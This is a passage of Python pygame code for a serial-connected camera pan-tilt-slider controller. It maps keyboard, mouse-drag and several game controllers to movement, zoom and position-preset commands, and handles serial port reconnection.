for p in ports:
available_ports.append(p.device) # Append each found serial port to array available_ports
if current_serialPort == ' - ':
if (wchusb_port in '\t'.join(available_ports)):
try:
current_serialPort = [string for string in available_ports if wchusb_port in string]
ser = Serial(current_serialPort[0], baudRate, timeout=0, writeTimeout=0)
temp='^W'
sendSerial(temp)
readSerial()
except:
current_serialPort = [' - ']
elif (usb_port in '\t'.join(available_ports)):
try:
current_serialPort = [string for string in available_ports if usb_port in string]
ser = Serial(current_serialPort[0], baudRate, timeout=0, writeTimeout=0)
temp='^W'
sendSerial(temp)
readSerial()
except:
current_serialPort = [' - ']
else:
current_serialPort = [' - ']
drop_down_serial = UIDropDownMenu(available_ports, # Recreate serial port drop down list
current_serialPort[0], # Currently selected port
pygame.Rect((620,95),
(250, 30)),
ui_manager)
serialPortTextBox()
textBoxJoystickName()
joyCircle = pygame.draw.circle(window_surface, pygame.Color("blue"), (225,225), radius)
joyCircle_draging = False
joyCircle.x = 195
joyCircle.y = 195
# Generate crosshair
crosshair = pygame.surface.Surface((30, 30))
crosshair.fill(pygame.Color("magenta"))
pygame.draw.circle(crosshair, pygame.Color("blue"), (radius,radius), radius)
crosshair.set_colorkey(pygame.Color("magenta"))#, pygame.RLEACCEL)
#crosshair = crosshair.convert()
sliderCircle = pygame.draw.circle(window_surface, pygame.Color("blue"), (225,415), radius)
sliderCircle_draging = False
sliderCircle.x = 195
sliderCircle.y = 415
# Generate crosshair
crosshairSlider = pygame.surface.Surface((30, 30))
crosshairSlider.fill(pygame.Color("magenta"))
pygame.draw.circle(crosshairSlider, pygame.Color("blue"), (radius,radius), radius)
crosshairSlider.set_colorkey(pygame.Color("magenta"))#, pygame.RLEACCEL)
#crosshair = crosshair.convert()
ui_manager.set_focus_set(textBoxSerial) # Sets focus so focus can be tested
def process_events():
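    # Handle one pass of the pygame event queue: UI button/drop-down events,
    # WASD and ',' '.' keyboard control, mouse zoom buttons, and joystick
    # input mapped per controller type (PS4, Xbox 360, Nimbus, SN30, other).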
global arr
global joystick
global joystickName
global button0Pressed
global button1Pressed
global button2Pressed
global button3Pressed
global button4Pressed
global button5Pressed
global button6Pressed
global button7Pressed
global button8Pressed
global button9Pressed
global button10Pressed
global button11Pressed
global button12Pressed
global button13Pressed
global button14Pressed
global button15Pressed
global button16Pressed
global oldAxisX
global oldAxisY
global oldAxisZ
global oldHatX
global oldHatY
global axisX
global axisY
global axisZ
global previousTime
global mouseMoving
global joyCircle_draging
global sliderCircle_draging
global offset_x
global offset_y
global sliderOffset_x
global sliderOffset_y
global running
global joyXreadDOT
global joyYreadDOT
global joyZreadDOT
global panKeyPresseed
global tiltKeyPresseed
global sliderKeyPresseed
global drop_down_serial
global isZooming
joyPS4 = "Sony"
joyPS4BT = "DUALSHOCK"
joyPS4Win = "PS4"
joy360 = "360"
joyNimbus = "Nimbus"
joySN30 = "SN30"
joySN30BT = "Unknown Wireless Controller"
UITextEntry = "UITextEntryLine"
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
if event.type == pygame.MOUSEBUTTONDOWN:
if 482 <= mouse[0] <= 482+56 and 262 <= mouse[1] <= 262+56:
isZooming = True
sendZOOMin()
#print("IN pressed")
if 482 <= mouse[0] <= 482+56 and 322 <= mouse[1] <= 322+56:
isZooming = True
sendZOOMout()
#print("OUT pressed")
if event.type == pygame.MOUSEBUTTONUP and isZooming:
isZooming = False
sendZOOMstop()
ui_manager.process_events(event)
deadRangeLow = -0.2
deadRangeHigh = 0.2
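        # Axis readings between -0.2 and 0.2 are treated as centred (dead zone)
        # before being rescaled to the -255..255 range sent to the controller.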
whereIsFocus = str(ui_manager.get_focus_set())
if (event.type == pygame.KEYDOWN) and not (UITextEntry in whereIsFocus):
if event.key == ord('a'):
axisX = int(-255)
panKeyPresseed = True
#print('Left')
if event.key == ord('d'):
axisX = int(255)
panKeyPresseed = True
#print('Right')
if event.key == ord('w'):
axisY = int(-255)
tiltKeyPresseed = True
#print('Up')
if event.key == ord('s'):
axisY = int(255)
tiltKeyPresseed = True
#print('Down')
if event.key == ord(','):
axisZ = int(-255)
sliderKeyPresseed = True
#print('Slider Left')
if event.key == ord('.'):
axisZ = int(255)
sliderKeyPresseed = True
#print('Slider Right')
if (event.type == pygame.KEYUP) and not (UITextEntry in whereIsFocus):
if event.key == ord('a'):
axisX = int(0)
panKeyPresseed = False
#print('Left stop')
if event.key == ord('d'):
axisX = int(0)
panKeyPresseed = False
#print('Right stop')
if event.key == ord('w'):
axisY = int(0)
tiltKeyPresseed = False
#print('Up stop')
if event.key == ord('s'):
axisY = int(0)
tiltKeyPresseed = False
#print('Down stop')
if event.key == ord(','):
axisZ = int(0)
sliderKeyPresseed = False
#print('Slider Left stop')
if event.key == ord('.'):
axisZ = int(0)
sliderKeyPresseed = False
#print('Slider Right stop')
# left 1
# right 2
# down 3
# up 4
if joystick == '':
pass
else:
if (joyPS4 in joystickName) or (joyPS4BT in joystickName) or (joyPS4Win in joystickName):
#print ("PS4 Controller Found")
hat = joystick.get_hat(0)
hatX = hat[0]
hatY = hat[1]
if (hatX != oldHatX):
oldHatX = hatX
if hatX == 1: # PS4 RIGHT
sendSET2()
if hatX == -1: # PS4 LEFT
sendSET1()
if (hatY != oldHatY):
oldHatY = hatY
if hatY == 1: # PS4 UP
sendSET4()
if hatY == -1: # PS4 DOWN
sendSET3()
if event.type == pygame.JOYBUTTONDOWN:
if (joystick.get_button(0) and not button0Pressed): # PS4 Square
button0Pressed = True
sendGO1()
#print("0 - Squ")
elif (joystick.get_button(1) and not button1Pressed): # PS4 Cross
button1Pressed = True
sendGO3()
#print("1 - Cro")
elif (joystick.get_button(2) and not button2Pressed): # PS4 Circle
button2Pressed = True
sendGO2()
#print("2" - Cir)
elif (joystick.get_button(3) and not button3Pressed): # PS4 Triangle
button3Pressed = True
sendGO4()
#print("3 - Tri")
elif (joystick.get_button(4) and not button4Pressed): # PS4 L1
button4Pressed = True
sendSPEEDslow()
#print("4 - L1")
elif (joystick.get_button(5) and not button5Pressed): # PS4 R1
button5Pressed = True
sendSPEEDfast()
#print("5 - R1")
elif (joystick.get_button(6) and not button6Pressed): # PS4 L2
button6Pressed = True
sendZOOMout()
isZooming = True
#print("6 - L2")
elif (joystick.get_button(7) and not button7Pressed): # PS4 R2
button7Pressed = True
sendZOOMin()
isZooming = True
#print("7 - R2")
elif (joystick.get_button(8) and not button8Pressed): # PS4 Share
button8Pressed = True
sendREPORTpos()
#print("8 - Sha")
elif (joystick.get_button(9) and not button9Pressed): # PS4 Option
button9Pressed = True
sendREPORTpos()
#print("9 - Opt")
elif (joystick.get_button(10) and not button10Pressed): # PS4 L3
                        button10Pressed = True
sendREPORTpos()
#print("10 - L3")
elif (joystick.get_button(11) and not button11Pressed): # PS4 R3
button11Pressed = True
sendREPORTpos()
#print("11 - R3")
if event.type == pygame.JOYBUTTONUP:
if button6Pressed and not joystick.get_button(6):
button6Pressed = False
sendZOOMstop()
isZooming = False
elif button7Pressed and not joystick.get_button(7):
button7Pressed = False
sendZOOMstop()
isZooming = False
if not panKeyPresseed and not tiltKeyPresseed and not joyCircle_draging:
joyXread = joystick.get_axis(0)
joyYread = joystick.get_axis(1)
if (joyXread < deadRangeLow):
axisX = int(scale(joyXread, (-1.0,deadRangeLow), (-255,0)))
elif (joyXread > deadRangeHigh):
axisX = int(scale(joyXread, (deadRangeHigh,1.0), (0,255)))
else:
axisX = 0
if (joyYread < deadRangeLow):
axisY = int(scale(joyYread, (-1.0,deadRangeLow), (-255,0)))
elif (joyYread > deadRangeHigh):
axisY = int(scale(joyYread, (deadRangeHigh,1.0), (0,255)))
else:
axisY = 0
if not sliderKeyPresseed and not sliderCircle_draging:
joyZread = joystick.get_axis(2)
if (joyZread < deadRangeLow):
axisZ = int(scale(joyZread, (-1.0,deadRangeLow), (-255,0)))
elif (joyZread > deadRangeHigh):
axisZ = int(scale(joyZread, (deadRangeHigh,1.0), (0,255)))
else:
axisZ = 0
elif joy360 in joystickName:
#print ("360 Controller Found")
if event.type == pygame.JOYBUTTONDOWN:
if (joystick.get_button(0) and not button0Pressed): # 360 - A
button0Pressed = True
sendGO3()
#print("0 - A")
elif (joystick.get_button(1) and not button1Pressed): # 360 - B
button1Pressed = True
sendGO2()
#print("1 - B")
elif (joystick.get_button(2) and not button2Pressed): # 360 - X
button2Pressed = True
sendGO1()
#print("2 - X")
elif (joystick.get_button(3) and not button3Pressed): # 360 - Y
button3Pressed = True
sendGO4()
#print("3 - Y")
elif (joystick.get_button(4) and not button4Pressed): # 360 - L1
button4Pressed = True
sendSPEEDslow()
#print("4 - L1")
elif (joystick.get_button(5) and not button5Pressed): # 360 - R1
button5Pressed = True
sendSPEEDfast()
#print("5 - R1")
elif (joystick.get_button(6) and not button6Pressed): # 360 - L3
button6Pressed = True
sendREPORTall()
#print("6 - L3")
elif (joystick.get_button(7) and not button7Pressed): # 360 - R3
button7Pressed = True
sendREPORTall()
#print("7 - R3")
elif (joystick.get_button(8) and not button8Pressed): # 360 - Start
button8Pressed = True
sendREPORTall()
#print("8 - Start")
elif (joystick.get_button(9) and not button9Pressed): # 360 - Back
button9Pressed = True
sendREPORTall()
#print("9 - Back")
elif (joystick.get_button(10) and not button10Pressed): # 360 - XBOX
button10Pressed = True
sendREPORTall()
#print("10 - XBOX")
elif (joystick.get_button(11) and not button11Pressed): # 360 - Up
button11Pressed = True
sendSET4()
#print("11 - Up")
elif (joystick.get_button(12) and not button12Pressed): # 360 - Down
button12Pressed = True
sendSET3()
#print("12 - Down")
elif (joystick.get_button(13) and not button13Pressed): # 360 - Left
button13Pressed = True
sendSET1()
#print("13 - Left")
elif (joystick.get_button(14) and not button14Pressed): # 360 - Right
button14Pressed = True
sendSET2()
#print("14 - Right")
if not panKeyPresseed and not tiltKeyPresseed and not joyCircle_draging:
joyXread = joystick.get_axis(0)
joyYread = joystick.get_axis(1)
joyL2read = joystick.get_axis(2)
joyR2read = joystick.get_axis(5)
if (joyXread < deadRangeLow):
axisX = int(scale(joyXread, (-1.0,deadRangeLow), (-255,0)))
elif (joyXread > deadRangeHigh):
axisX = int(scale(joyXread, (deadRangeHigh,1.0), (0,255)))
else:
axisX = 0
if (joyYread < deadRangeLow):
axisY = int(scale(joyYread, (-1.0,deadRangeLow), (-255,0)))
elif (joyYread > deadRangeHigh):
axisY = int(scale(joyYread, (deadRangeHigh,1.0), (0,255)))
else:
axisY = 0
if (joyL2read > 0) and not button15Pressed:
isZooming = True
sendZOOMout()
button15Pressed = True
if (joyR2read > 0) and not button16Pressed:
isZooming = True
sendZOOMin()
button16Pressed = True
if (button15Pressed and (joyL2read < 0)):
isZooming = False
sendZOOMstop()
button15Pressed = False
if (button16Pressed and (joyR2read < 0)):
isZooming = False
sendZOOMstop()
button16Pressed = False
if not sliderKeyPresseed and not sliderCircle_draging:
joyZread = joystick.get_axis(3)
if (joyZread < deadRangeLow):
axisZ = int(scale(joyZread, (-1.0,deadRangeLow), (-255,0)))
elif (joyZread > deadRangeHigh):
axisZ = int(scale(joyZread, (deadRangeHigh,1.0), (0,255)))
else:
axisZ = 0
elif joyNimbus in joystickName:
#print ("Nimbus Controller Found")
if event.type == pygame.JOYBUTTONDOWN:
if (joystick.get_button(0) and not button0Pressed): # Nimbus - A
button0Pressed = True
sendGO3()
#print("0 - A")
elif (joystick.get_button(1) and not button1Pressed): # Nimbus - B
button1Pressed = True
sendGO2()
#print("1 - B")
elif (joystick.get_button(2) and not button2Pressed): # Nimbus - X
button2Pressed = True
sendGO1()
#print("2 - X")
elif (joystick.get_button(3) and not button3Pressed): # Nimbus - Y
button3Pressed = True
sendGO4()
#print("3 - Y")
elif (joystick.get_button(4) and not button4Pressed): # Nimbus - L1
button4Pressed = True
sendSPEEDslow()
#print("4 - L1")
elif (joystick.get_button(5) and not button5Pressed): # Nimbus - R1
button5Pressed = True
sendSPEEDfast()
#print("5 - R1")
elif (joystick.get_button(6) and not button6Pressed): # Nimbus - L2
button6Pressed = True
isZooming = True
sendZOOMout()
#print("6 - L2")
elif (joystick.get_button(7) and not button7Pressed): # Nimbus - R2
button7Pressed = True
isZooming = True
sendZOOMin()
#print("7 - R2")
elif (joystick.get_button(8) and not button8Pressed): # Nimbus - Up
button8Pressed = True
sendSET4()
#print("8 - Up")
elif (joystick.get_button(9) and not button9Pressed): # Nimbus - Down
button9Pressed = True
sendSET3()
#print("9 - Down")
elif (joystick.get_button(10) and not button10Pressed): # Nimbus - Right
button10Pressed = True
sendSET2()
#print("10 - Right")
elif (joystick.get_button(11) and not button11Pressed): # Nimbus - Left
button11Pressed = True
sendSET1()
#print("11 - Left")
elif (joystick.get_button(12) and not button12Pressed): # Nimbus - Menu
button12Pressed = True
sendREPORTall()
#print("12 - Menu")
if event.type == pygame.JOYBUTTONUP:
if button6Pressed and not joystick.get_button(6):
button6Pressed = False
sendZOOMstop()
isZooming = False
elif button7Pressed and not joystick.get_button(7):
button7Pressed = False
sendZOOMstop()
isZooming = False
if not panKeyPresseed and not tiltKeyPresseed and not joyCircle_draging:
joyXread = joystick.get_axis(0)
joyYread = -(joystick.get_axis(1))
if (joyXread < deadRangeLow):
axisX = int(scale(joyXread, (-1.0,deadRangeLow), (-255,0)))
elif (joyXread > deadRangeHigh):
axisX = int(scale(joyXread, (deadRangeHigh,1.0), (0,255)))
else:
axisX = 0
if (joyYread < deadRangeLow):
axisY = int(scale(joyYread, (-1.0,deadRangeLow), (-255,0)))
elif (joyYread > deadRangeHigh):
axisY = int(scale(joyYread, (deadRangeHigh,1.0), (0,255)))
else:
axisY = 0
if not sliderKeyPresseed and not sliderCircle_draging:
joyZread = joystick.get_axis(2)
if (joyZread < deadRangeLow):
axisZ = int(scale(joyZread, (-1.0,deadRangeLow), (-255,0)))
elif (joyZread > deadRangeHigh):
axisZ = int(scale(joyZread, (deadRangeHigh,1.0), (0,255)))
else:
axisZ = 0
elif (joySN30 in joystickName) or (joySN30BT in joystickName):
#print ("SN30 Controller Found")
hat = joystick.get_hat(0)
hatX = hat[0]
hatY = hat[1]
if (hatX != oldHatX):
oldHatX = hatX
if hatX == 1: # SN30 RIGHT
sendSET2()
if hatX == -1: # SN30 LEFT
sendSET1()
if (hatY != oldHatY):
oldHatY = hatY
if hatY == 1: # SN30 UP
sendSET4()
if hatY == -1: # SN30 DOWN
sendSET3()
if event.type == pygame.JOYBUTTONDOWN:
if (joystick.get_button(0) and not button0Pressed): # SN30 - B
button0Pressed = True
sendGO3()
#print("0 - B")
elif (joystick.get_button(1) and not button1Pressed): # SN30 - A
button1Pressed = True
sendGO2()
#print("1 - A")
elif (joystick.get_button(2) and not button2Pressed): # SN30 - Heart
button2Pressed = True
sendREPORTall()
#print("2 - Heart")
elif (joystick.get_button(3) and not button3Pressed): # SN30 - X
button3Pressed = True
sendGO4()
#print("3 - X")
elif (joystick.get_button(4) and not button4Pressed): # SN30 - Y
button4Pressed = True
sendGO1()
#print("4 - Y")
#elif (joystick.get_button(5) and not button5Pressed): # SN30 - None
# button5Pressed = True
# sendREPORTall()
#print("5 - None")
elif (joystick.get_button(6) and not button6Pressed): # SN30 - L1
button6Pressed = True
sendSPEEDslow()
#print("6 - L1")
elif (joystick.get_button(7) and not button7Pressed): # SN30 - R1
button7Pressed = True
sendSPEEDfast()
#print("7 - R1")
elif (joystick.get_button(8) and not button8Pressed): # SN30 - L2
button8Pressed = True
isZooming = True
sendZOOMout()
#print("8 - L2")
elif (joystick.get_button(9) and not button9Pressed): # SN30 - R2
button9Pressed = True
isZooming = True
sendZOOMin()
#print("9 - R2")
elif (joystick.get_button(10) and not button10Pressed): # SN30 - Select
button10Pressed = True
sendREPORTall()
#print("10 - Select")
elif (joystick.get_button(11) and not button11Pressed): # SN30 - Start
button11Pressed = True
sendREPORTall()
#print("11 - Start")
#elif (joystick.get_button(12) and not button12Pressed): # SN30 - None
                    # button12Pressed = True
# sendREPORTall()
#print("12 - None")
elif (joystick.get_button(13) and not button13Pressed): # SN30 - L3
button13Pressed = True
sendREPORTall()
#print("13 - L3")
elif (joystick.get_button(14) and not button14Pressed): # SN30 - R3
button14Pressed = True
sendREPORTall()
#print("14 - R3")
if event.type == pygame.JOYBUTTONUP:
if button8Pressed and not joystick.get_button(8):
button8Pressed = False
sendZOOMstop()
isZooming = False
elif button9Pressed and not joystick.get_button(9):
button9Pressed = False
sendZOOMstop()
isZooming = False
if not panKeyPresseed and not tiltKeyPresseed and not joyCircle_draging:
joyXread = joystick.get_axis(0)
joyYread = joystick.get_axis(1)
if (joyXread < deadRangeLow):
axisX = int(scale(joyXread, (-1.0,deadRangeLow), (-255,0)))
elif (joyXread > deadRangeHigh):
axisX = int(scale(joyXread, (deadRangeHigh,1.0), (0,255)))
else:
axisX = 0
if (joyYread < deadRangeLow):
axisY = int(scale(joyYread, (-1.0,deadRangeLow), (-255,0)))
elif (joyYread > deadRangeHigh):
axisY = int(scale(joyYread, (deadRangeHigh,1.0), (0,255)))
else:
axisY = 0
if not sliderKeyPresseed and not sliderCircle_draging:
joyZread = joystick.get_axis(2)
if (joyZread < deadRangeLow):
axisZ = int(scale(joyZread, (-1.0,deadRangeLow), (-255,0)))
elif (joyZread > deadRangeHigh):
axisZ = int(scale(joyZread, (deadRangeHigh,1.0), (0,255)))
else:
axisZ = 0
else:
#print ("Other Controller Found")
if event.type == pygame.JOYBUTTONDOWN:
if (joystick.get_button(0) and not button0Pressed): # A
button0Pressed = True
sendGO4()
#print("0 - A")
elif (joystick.get_button(1) and not button1Pressed): # B
button1Pressed = True
sendGO1()
#print("1 - B")
elif (joystick.get_button(2) and not button2Pressed): # X
button2Pressed = True
sendGO2()
#print("2 - X")
elif (joystick.get_button(3) and not button3Pressed): # Y
button3Pressed = True
sendGO3()
#print("3 - Y")
elif (joystick.get_button(4) and not button4Pressed): # L1
button4Pressed = True
sendSPEEDslow()
#print("4 - L1")
elif (joystick.get_button(5) and not button5Pressed): # R1
button5Pressed = True
sendSPEEDfast()
#print("5 - R1")
elif (joystick.get_button(6) and not button6Pressed): # L2
button6Pressed = True
isZooming = True
sendZOOMout()
#print("6 - L2")
elif (joystick.get_button(7) and not button7Pressed): # R2
button7Pressed = True
isZooming = True
sendZOOMin()
#print("7 - R2")
elif (joystick.get_button(8) and not button8Pressed): # Up
button8Pressed = True
sendSET3()
#print("8 - Up")
elif (joystick.get_button(9) and not button9Pressed): # Down
button9Pressed = True
sendSET4()
#print("9 - Down")
elif (joystick.get_button(10) and not button10Pressed): # Right
button10Pressed = True
sendSET1()
#print("10 - Right")
elif (joystick.get_button(11) and not button11Pressed): # Left
button11Pressed = True
sendSET2()
#print("11 - Left")
elif (joystick.get_button(12) and not button12Pressed): # Menu
button12Pressed = True
sendREPORTall()
#print("12 - Menu")
if event.type == pygame.JOYBUTTONUP:
if button6Pressed and not joystick.get_button(6):
button6Pressed = False
sendZOOMstop()
isZooming = False
elif button7Pressed and not joystick.get_button(7):
button7Pressed = False
sendZOOMstop()
isZooming = False
if not panKeyPresseed and not tiltKeyPresseed and not joyCircle_draging:
joyXread = joystick.get_axis(0)
joyYread = joystick.get_axis(1)
if (joyXread < deadRangeLow):
axisX = int(scale(joyXread, (-1.0,deadRangeLow), (-255,0)))
elif (joyXread > deadRangeHigh):
axisX = int(scale(joyXread, (deadRangeHigh,1.0), (0,255)))
else:
axisX = 0
if (joyYread < deadRangeLow):
axisY = int(scale(joyYread, (-1.0,deadRangeLow), (-255,0)))
elif (joyYread > deadRangeHigh):
axisY = int(scale(joyYread, (deadRangeHigh,1.0), (0,255)))
else:
axisY = 0
if not sliderKeyPresseed and not sliderCircle_draging:
joyZread = joystick.get_axis(2)
if (joyZread < deadRangeLow):
axisZ = int(scale(joyZread, (-1.0,deadRangeLow), (-255,0)))
elif (joyZread > deadRangeHigh):
axisZ = int(scale(joyZread, (deadRangeHigh,1.0), (0,255)))
else:
axisZ = 0
if event.type == pygame.JOYBUTTONUP:
if (button0Pressed and not joystick.get_button(0)):
button0Pressed = False
elif (button1Pressed and not joystick.get_button(1)):
button1Pressed = False
elif (button2Pressed and not joystick.get_button(2)):
button2Pressed = False
elif (button3Pressed and not joystick.get_button(3)):
button3Pressed = False
elif (button4Pressed and not joystick.get_button(4)):
button4Pressed = False
elif (button5Pressed and not joystick.get_button(5)):
button5Pressed = False
elif (button6Pressed and not joystick.get_button(6)):
button6Pressed = False
elif (button7Pressed and not joystick.get_button(7)):
button7Pressed = False
elif (button8Pressed and not joystick.get_button(8)):
button8Pressed = False
elif (button9Pressed and not joystick.get_button(9)):
button9Pressed = False
elif (button10Pressed and not joystick.get_button(10)):
button10Pressed = False
elif (button11Pressed and not joystick.get_button(11)):
button11Pressed = False
elif (button12Pressed and not joystick.get_button(12)):
button12Pressed = False
elif (button13Pressed and not joystick.get_button(13)):
button13Pressed = False
elif (button14Pressed and not joystick.get_button(14)):
button14Pressed = False
if event.type == pygame.USEREVENT:
if (event.user_type == pygame_gui.UI_TEXT_ENTRY_FINISHED):
sendSerial(event.text)
serial_text_entry.set_text('')
if event.user_type == pygame_gui.UI_CONFIRMATION_DIALOG_CONFIRMED:
sendCLEARALLpos()
if event.user_type == pygame_gui.UI_BUTTON_PRESSED:
if event.ui_element == rel_button_L1:
sendLEFT1()
elif event.ui_element == rel_button_L10:
sendLEFT10()
elif event.ui_element == rel_button_R1:
sendRIGHT1()
elif event.ui_element == rel_button_R10:
sendRIGHT10()
elif event.ui_element == rel_button_U1:
sendUP1()
elif event.ui_element == rel_button_U10:
sendUP10()
elif event.ui_element == rel_button_D1:
sendDOWN1()
elif event.ui_element == rel_button_D10:
sendDOWN10()
#elif event.ui_element == rel_button_set0:
# sendRESETpos()
elif event.ui_element == rel_button_SR10:
sendSR1()
elif event.ui_element == rel_button_SR100:
sendSR10()
elif event.ui_element == rel_button_SL10:
sendSL1()
elif event.ui_element == rel_button_SL100:
sendSL10()
elif event.ui_element == rel_button_SET1:
if not (pos1run or pos2run or pos3run or pos4run or pos5run or pos6run):
sendSET1()
elif event.ui_element == rel_button_SET2:
if not (pos1run or pos2run or pos3run or pos4run or pos5run or pos6run):
sendSET2()
elif event.ui_element == rel_button_SET3:
if not (pos1run or pos2run or pos3run or pos4run or pos5run or pos6run):
sendSET3()
elif event.ui_element == rel_button_SET4:
if not (pos1run or pos2run or pos3run or pos4run or pos5run or pos6run):
sendSET4()
elif event.ui_element == rel_button_SET5:
if not (pos1run or pos2run or pos3run or pos4run or pos5run or pos6run):
sendSET5()
elif event.ui_element == rel_button_SET6:
if not (pos1run or pos2run or pos3run or pos4run or pos5run or pos6run):
sendSET6()
elif event.ui_element == rel_button_GO1:
if pos1set and not atPos1 and not (pos1run or pos2run or pos3run or pos4run or pos5run or pos6run):
sendGO1()
elif event.ui_element == rel_button_GO2:
if pos2set and not atPos2 and not (pos1run or pos2run or pos3run or pos4run or pos5run or pos6run):
sendGO2()
elif event.ui_element == rel_button_GO3:
if pos3set and not atPos3 and not (pos1run or pos2run or pos3run or pos4run or pos5run or pos6run):
sendGO3()
elif event.ui_element == rel_button_GO4:
if pos4set and not atPos4 and not (pos1run or pos2run or pos3run or pos4run or pos5run or pos6run):
sendGO4()
elif event.ui_element == rel_button_GO5:
if pos5set and not atPos5 and not (pos1run or pos2run or pos3run or pos4run or pos5run or pos6run):
sendGO5()
elif event.ui_element == rel_button_GO6:
if pos6set and not atPos6 and not (pos1run or pos2run or pos3run or pos4run or pos5run or pos6run):
sendGO6()
elif event.ui_element == rel_button_CLEARALL:
clearPosConfirm()
elif event.ui_element == rel_button_Refresh:
doRefresh()
elif event.ui_element == rel_button_SLOW:
sendSPEEDslow()
elif event.ui_element == rel_button_FAST:
sendSPEEDfast()
elif event.ui_element == rel_button_REPORT:
sendREPORTall()
elif event.ui_element == rel_button_REPORTPOS:
sendREPORTpos()
elif event.ui_element == rel_button_CLEARtext:
sendCLEARtext()
if (event.user_type == pygame_gui.UI_DROP_DOWN_MENU_CHANGED
and event.ui_element == drop_down_serial):
serialPort_changed()
if event.type == pygame.MOUSEBUTTONDOWN:
if event.button == 1:
if joyCircle.collidepoint(event.pos):
joyCircle_draging = True
mouse_x, mouse_y = event.pos
offset_x = joyCircle.x - mouse_x
offset_y = joyCircle.y - mouse_y
if sliderCircle.collidepoint(event.pos):
sliderCircle_draging = True
mouse_x, mouse_y = event.pos
sliderOffset_x = sliderCircle.x - mouse_x
sliderOffset_y = sliderCircle.y - mouse_y
if event.type == pygame.MOUSEBUTTONUP:
if event.button == 1:
if joyCircle_draging:
joyCircle_draging = False
joyCircle.x = 195
joyCircle.y = 195
axisX = int(0)
axisY = int(0)
if sliderCircle_draging:
sliderCircle_draging = False
sliderCircle.x = 195
sliderCircle.y = 415
axisZ = int(0)
mouseMoving = False
if isZooming:
sendZOOMstop()
isZooming = False
if event.type == pygame.MOUSEMOTION:
if joyCircle_draging:
mouseMoving = True
mouse_x, mouse_y = event.pos
joyCircle.x = mouse_x
joyCircle.y = mouse_y
"""
if ((mouse_x + offset_x) > mouseBorder) and ((mouse_y + offset_y) > mouseBorder): # XY Dot out of box: right & bottom
joyCircle.x = mouseBorder
joyCircle.y = mouseBorder
elif (((mouse_x + offset_x) > mouseBorder) and ((mouse_y + offset_y) < 30)): # XY Dot out of box: right & top
joyCircle.x = mouseBorder
joyCircle.y = 30
elif (((mouse_x + offset_x) < 30) and ((mouse_y + offset_y) > mouseBorder)): # XY Dot out of box: left & bottom
joyCircle.x = 30
joyCircle.y = mouseBorder
elif (((mouse_x + offset_x) < 30) and ((mouse_y + offset_y) < 30)): # XY Dot out of box: left & top
joyCircle.x = 30
joyCircle.y = 30
elif ((mouse_x + offset_x) > (mouseBorder)): # XY Dot out of box: right
joyCircle.x = mouseBorder
joyCircle.y = mouse_y + offset_y
elif ((mouse_x + offset_x) < 30): # XY Dot out of box: left
joyCircle.x = 30
joyCircle.y = mouse_y + offset_y
elif ((mouse_y + offset_y) > (mouseBorder)): # XY Dot out of box: bottom
joyCircle.y = mouseBorder
joyCircle.x = mouse_x + offset_x
elif ((mouse_y + offset_y) < 30): # XY Dot out of box: top
joyCircle.y = 30
joyCircle.x = mouse_x + offset_x
else:
"""
joyCircle.x = mouse_x + offset_x # XY Dot inside box
joyCircle.y = mouse_y + offset_y
axisX = int(scale((joyCircle.x), (30,mouseBorder), (-255,255)))
axisY = int(scale((joyCircle.y), (30,mouseBorder), (-255,255)))
if axisX > 255:
axisX = 255
if axisY > 255:
axisY = 255
if axisX < -255:
axisX = -255
if axisY < -255:
axisY = -255
if sliderCircle_draging:
mouseMoving = True
mouse_x, mouse_y = event.pos
sliderCircle.x = mouse_x
sliderCircle.y = 420
if ((mouse_x + sliderOffset_x) > mouseBorder): # Z Dot out of box: right
sliderCircle.x = mouseBorder
elif ((mouse_x + sliderOffset_x) < 30): # Z Dot out of box: left
sliderCircle.x = 30
else:
sliderCircle.x = mouse_x + sliderOffset_x # Z Dot inside box
axisZ = int(scale((sliderCircle.x), (30,mouseBorder), (-255,255)))
#axisXDOT = scale(axisX, (-255,255), (-1.0,1.0))
#axisYDOT = scale(axisY, (-255,255), (-1.0,1.0))
#axisZDOT = scale(axisZ, (-255,255), (-1.0,1.0))
#joyCircle.x = (axisXDOT*165)+210-radius
#joyCircle.y = (axisYDOT*165)+210-radius
#sliderCircle.x = (axisZDOT*165)+210-radius
while running:
time_delta = clock.tick() / 1000.0
time_delta_stack.append(time_delta)
process_events() # check for input
if (((axisX != oldAxisX) or (axisY != oldAxisY) or (axisZ != oldAxisZ)) and ((time.time() - previousTime) > 0.1)):
previousTime = time.time()
oldAxisX = axisX
oldAxisY = axisY
oldAxisZ = axisZ
axisXh = tohex(axisX, 16)
axisYh = tohex(-axisY, 16)
axisZh = tohex(axisZ, 16)
arr = [4, axisZh, axisXh, axisYh]
sendJoystick(arr)
#print(4,' - ', axisZh, ' - ', axisXh, ' - ', axisYh)
try:
readSerial()
except:
ser=''
current_serialPort = [' - ']
serialNotSel = 'Serial port disconnected.<br>'
textBoxSerial.kill()
serialText = serialNotSel + serialText
serialPortTextBox()
speedRec = False
pos1set = False
pos2set = False
pos3set = False
pos4set = False
pos5set = False
pos6set = False
atPos1 = False
atPos2 = False
atPos3 = False
atPos4 = False
atPos5 = False
atPos6 = False
pos1run = False
pos2run = False
pos3run = False
pos4run = False
pos5run = False
pos6run = False
ports = serial.tools.list_ports.comports() # Search for attached serial ports
available_ports = []
for p in ports:
available_ports.append(p.device) # Append each found serial port to array available_ports
drop_down_serial.kill()
drop_down_serial = UIDropDownMenu(available_ports, # Recreate serial port drop down list
current_serialPort[0], # Currently selected port
pygame.Rect((620,95),
(250, 30)),
ui_manager)
ui_manager.update(time_delta) # respond to input
# Clear screen
window_surface.blit(background_surface, (0, 0)) # draw graphics
# Draw position LEDs
if pos1set and not pos1run and not atPos1:
pygame.draw.circle(window_surface, RED, (60, 480), radius/2)
elif pos1set and not pos1run and atPos1:
pygame.draw.circle(window_surface, GREEN, (60, 480), radius/2)
elif pos1set and pos1run and not atPos1:
if blinkSet:
pygame.draw.circle(window_surface, GREEN, (60, 480), radius/2)
else:
pygame.draw.circle(window_surface, OFF, (60, 480), radius/2)
elif not pos1set:
pygame.draw.circle(window_surface, OFF, (60, 480), radius/2)
if pos2set and not pos2run and not atPos2:
pygame.draw.circle(window_surface, RED, (120, 480), radius/2)
elif pos2set and not pos2run and atPos2:
pygame.draw.circle(window_surface, GREEN, (120, 480), radius/2)
elif pos2set and pos2run and not atPos2:
if blinkSet:
pygame.draw.circle(window_surface, GREEN, (120, 480), radius/2)
else:
pygame.draw.circle(window_surface, OFF, (120, 480), radius/2)
elif not pos2set:
pygame.draw.circle(window_surface, OFF, (120, 480), radius/2)
if pos3set and not pos3run and not atPos3:
